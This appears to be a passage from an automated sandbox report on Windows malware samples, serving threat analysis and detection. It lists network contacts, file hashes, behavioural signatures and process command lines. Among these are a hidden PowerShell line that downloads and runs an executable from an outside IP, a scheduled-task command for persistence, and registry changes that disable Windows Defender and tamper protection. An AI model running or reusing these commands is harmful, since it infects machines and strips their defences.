| US | 8.8.8.8:53 | deaddereaste.today | udp |
| US | 8.8.8.8:53 | subawhipnator.life | udp |
| US | 8.8.8.8:53 | privileggoe.live | udp |
| US | 8.8.8.8:53 | decreaserid.world | udp |
| US | 8.8.8.8:53 | pastedeputten.life | udp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| GB | 104.82.234.109:443 | steamcommunity.com | tcp |
| US | 8.8.8.8:53 | disobilittyhell.live | udp |
| US | 104.21.81.29:443 | disobilittyhell.live | tcp |
| US | 104.21.81.29:443 | disobilittyhell.live | tcp |
| US | 104.21.81.29:443 | disobilittyhell.live | tcp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\67bcef97a5ffe.vbs
| MD5 | e8b52173ea80a3b35b476222cef45835 |
| SHA1 | 492bbd503f6ac03375104e5e0ec16095117732da |
| SHA256 | 15b1f23eff2c505506e6b434806d2ee0b22a6b7bade8e6760225cc36f1e4af06 |
| SHA512 | 814a971f4dd36d5983dd768560032701fd5c0b19eda5d88beb5079793f4b6eb02cdfb52f2ac90a1d5293b1b2e421e09e98e5ae78150bffc4f577a65e059fbc10 |
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tj1rh1cl.yv4.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/888-13-0x0000025D902B0000-0x0000025D902D2000-memory.dmp
memory/1484-23-0x000001A780090000-0x000001A7800A8000-memory.dmp
memory/4176-24-0x0000000000400000-0x000000000045E000-memory.dmp
memory/4176-27-0x0000000000400000-0x000000000045E000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | d8b9a260789a22d72263ef3bb119108c |
| SHA1 | 376a9bd48726f422679f2cd65003442c0b6f6dd5 |
| SHA256 | d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc |
| SHA512 | 550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | f41839a3fe2888c8b3050197bc9a0a05 |
| SHA1 | 0798941aaf7a53a11ea9ed589752890aee069729 |
| SHA256 | 224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a |
| SHA512 | 2acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699 |
Analysis: behavioral26
Detonation Overview
Submitted
2025-02-26 23:27
Reported
2025-02-26 23:30
Platform
win10v2004-20250217-en
Max time kernel
149s
Max time network
150s
Command Line
Signatures
Detects Healer an antivirus disabler dropper
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Healer
Healer family
Modifies Windows Defender DisableAntiSpyware settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" | C:\Users\Admin\AppData\Local\TempXXYUCBWWCRHPACBVM1MHEMPNXAOWHCIX.EXE | N/A |
Modifies Windows Defender Real-time Protection settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Users\Admin\AppData\Local\TempXXYUCBWWCRHPACBVM1MHEMPNXAOWHCIX.EXE | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Users\Admin\AppData\Local\TempXXYUCBWWCRHPACBVM1MHEMPNXAOWHCIX.EXE | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | C:\Users\Admin\AppData\Local\TempXXYUCBWWCRHPACBVM1MHEMPNXAOWHCIX.EXE | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Users\Admin\AppData\Local\TempXXYUCBWWCRHPACBVM1MHEMPNXAOWHCIX.EXE | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Users\Admin\AppData\Local\TempXXYUCBWWCRHPACBVM1MHEMPNXAOWHCIX.EXE | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Users\Admin\AppData\Local\TempXXYUCBWWCRHPACBVM1MHEMPNXAOWHCIX.EXE | N/A |
Modifies Windows Defender TamperProtection settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" | C:\Users\Admin\AppData\Local\TempXXYUCBWWCRHPACBVM1MHEMPNXAOWHCIX.EXE | N/A |
Modifies Windows Defender notification settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications | C:\Users\Admin\AppData\Local\TempXXYUCBWWCRHPACBVM1MHEMPNXAOWHCIX.EXE | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" | C:\Users\Admin\AppData\Local\TempXXYUCBWWCRHPACBVM1MHEMPNXAOWHCIX.EXE | N/A |
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\TempXXYUCBWWCRHPACBVM1MHEMPNXAOWHCIX.EXE | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\TempXXYUCBWWCRHPACBVM1MHEMPNXAOWHCIX.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\TempXXYUCBWWCRHPACBVM1MHEMPNXAOWHCIX.EXE | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\TempXXYUCBWWCRHPACBVM1MHEMPNXAOWHCIX.EXE | N/A |
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine | C:\Users\Admin\AppData\Local\TempXXYUCBWWCRHPACBVM1MHEMPNXAOWHCIX.EXE | N/A |
Windows security modification
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features | C:\Users\Admin\AppData\Local\TempXXYUCBWWCRHPACBVM1MHEMPNXAOWHCIX.EXE | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" | C:\Users\Admin\AppData\Local\TempXXYUCBWWCRHPACBVM1MHEMPNXAOWHCIX.EXE | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\TempXXYUCBWWCRHPACBVM1MHEMPNXAOWHCIX.EXE | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\TempXXYUCBWWCRHPACBVM1MHEMPNXAOWHCIX.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\quarantine\random.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\TempXXYUCBWWCRHPACBVM1MHEMPNXAOWHCIX.EXE | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\TempXXYUCBWWCRHPACBVM1MHEMPNXAOWHCIX.EXE | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\TempXXYUCBWWCRHPACBVM1MHEMPNXAOWHCIX.EXE | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\TempXXYUCBWWCRHPACBVM1MHEMPNXAOWHCIX.EXE | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\TempXXYUCBWWCRHPACBVM1MHEMPNXAOWHCIX.EXE | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\quarantine\random.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\quarantine\random.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\quarantine\random.exe | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\quarantine\random.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\quarantine\random.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\quarantine\random.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\quarantine\random.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\random.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /create /tn sCXK4maXN6R /tr "mshta C:\Users\Admin\AppData\Local\Temp\5WMgEtyym.hta" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\SysWOW64\mshta.exe
mshta C:\Users\Admin\AppData\Local\Temp\5WMgEtyym.hta
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn sCXK4maXN6R /tr "mshta C:\Users\Admin\AppData\Local\Temp\5WMgEtyym.hta" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'XXYUCBWWCRHPACBVM1MHEMPNXAOWHCIX.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
C:\Users\Admin\AppData\Local\TempXXYUCBWWCRHPACBVM1MHEMPNXAOWHCIX.EXE
"C:\Users\Admin\AppData\Local\TempXXYUCBWWCRHPACBVM1MHEMPNXAOWHCIX.EXE"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| RU | 185.215.113.16:80 | 185.215.113.16 | tcp |
| US | 150.171.28.10:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\5WMgEtyym.hta
| MD5 | f8e2603fe8abf0fbff0c7219f29fb096 |
| SHA1 | f52c4823fe0f88c26709791ad0e1cfc4c72d5aa5 |
| SHA256 | 6c544774b42083b87161909dd85992ee985fc44e1527ba3d8d038dc22fad1de5 |
| SHA512 | bdeb4c6da166443882ba02338caa6deaa05c477bb7323f3be5b7d850de71af6c828ffa2f8d0f23fc695fda68553a5b17be5b724917c5871d7bd3af80f4ce5ec5 |
memory/1992-2-0x0000000002DE0000-0x0000000002E16000-memory.dmp
memory/1992-3-0x0000000005560000-0x0000000005B88000-memory.dmp
memory/1992-4-0x00000000054F0000-0x0000000005512000-memory.dmp
memory/1992-6-0x0000000005D30000-0x0000000005D96000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nq4kj3qw.14m.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1992-5-0x0000000005CC0000-0x0000000005D26000-memory.dmp
memory/1992-16-0x0000000005F70000-0x00000000062C4000-memory.dmp
memory/1992-17-0x0000000006390000-0x00000000063AE000-memory.dmp
memory/1992-18-0x0000000006440000-0x000000000648C000-memory.dmp
memory/1992-19-0x0000000007CD0000-0x000000000834A000-memory.dmp
memory/1992-20-0x00000000068D0000-0x00000000068EA000-memory.dmp
memory/1992-22-0x00000000078F0000-0x0000000007986000-memory.dmp
memory/1992-23-0x0000000007880000-0x00000000078A2000-memory.dmp
memory/1992-24-0x0000000008900000-0x0000000008EA4000-memory.dmp
C:\Users\Admin\AppData\Local\TempXXYUCBWWCRHPACBVM1MHEMPNXAOWHCIX.EXE
| MD5 | 03a574d64f0e62c5e117a5f5acf137e4 |
| SHA1 | 93ba2b5bdac91342c9eeaeaf3e44cc1793ee6d90 |
| SHA256 | dcc540b3c86a167bb0cf71e8d4598f7566fe0f625d64ffe7a37f0d5f502be747 |
| SHA512 | d1b76d82c522ccb157dcd5155011619b36baf3516cf08cb6bc98fb9bc009230e5c53d77f5d8adc0e85dde678b4b3542823919ee6490533df8250078caca1b9b1 |
memory/1932-35-0x0000000000610000-0x0000000000A62000-memory.dmp
memory/1932-38-0x0000000000610000-0x0000000000A62000-memory.dmp
memory/1932-39-0x0000000000610000-0x0000000000A62000-memory.dmp
memory/1932-41-0x0000000000610000-0x0000000000A62000-memory.dmp
memory/1932-44-0x0000000000610000-0x0000000000A62000-memory.dmp
Analysis: behavioral8
Detonation Overview
Submitted
2025-02-26 23:27
Reported
2025-02-26 23:30
Platform
win10v2004-20250217-en
Max time kernel
145s
Max time network
146s
Command Line
Signatures
Browser Information Discovery
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Processes
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument C:\Users\Admin\AppData\Local\Temp\quarantine\GEFwbK0.html
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff8f86f46f8,0x7ff8f86f4708,0x7ff8f86f4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2104,10773371733666435258,9919719629179311358,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2120 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2104,10773371733666435258,9919719629179311358,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2184 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2104,10773371733666435258,9919719629179311358,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2716 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10773371733666435258,9919719629179311358,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3232 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10773371733666435258,9919719629179311358,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3256 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2104,10773371733666435258,9919719629179311358,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5176 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2104,10773371733666435258,9919719629179311358,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5176 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10773371733666435258,9919719629179311358,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5240 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10773371733666435258,9919719629179311358,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5260 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10773371733666435258,9919719629179311358,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4064 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10773371733666435258,9919719629179311358,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5612 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2104,10773371733666435258,9919719629179311358,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1148 /prefetch:2
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | udp | |
| US | 150.171.28.10:443 | tcp | |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
Files
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | fffde59525dd5af902ac449748484b15 |
| SHA1 | 243968c68b819f03d15b48fc92029bf11e21bedc |
| SHA256 | 26bc5e85dd325466a27394e860cac7bef264e287e5a75a20ea54eec96abd0762 |
| SHA512 | f246854e8ed0f88ca43f89cf497b90383e05ffa107496b4c346f070f6e9bbf1d9dc1bdcc28cad6b5c7810e3ba39f27d549061b3b413a7c0dd49faacae68cd645 |
\??\pipe\LOCAL\crashpad_5080_BSPSSOACWQNWCXYB
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | ab283f88362e9716dd5c324319272528 |
| SHA1 | 84cebc7951a84d497b2c1017095c2c572e3648c4 |
| SHA256 | 61e4aa4614e645255c6db977ea7da1c7997f9676d8b8c3aaab616710d9186ab2 |
| SHA512 | 66dff3b6c654c91b05f92b7661985391f29763cf757cc4b869bce5d1047af9fb29bbe37c4097ddcfa021331c16dd7e96321d7c5236729be29f74853818ec1484 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 10bf642ac57e600422a5a3557ee16d98 |
| SHA1 | e8151529351b298372afa609d858c2c47c76e3e7 |
| SHA256 | db9f95714608f587eccccee430df0a34f8e5c37fdcd211cd1355bacd8a080f3c |
| SHA512 | 55d4915202219328869dda4a58dd9f6ce2584c0946611f6278b6932fa4a7877917ea4df68a0dfcb84ef38d76b9863190048e3b84fbdd6df85d225d5f4b4a787b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 6752a1d65b201c13b62ea44016eb221f |
| SHA1 | 58ecf154d01a62233ed7fb494ace3c3d4ffce08b |
| SHA256 | 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd |
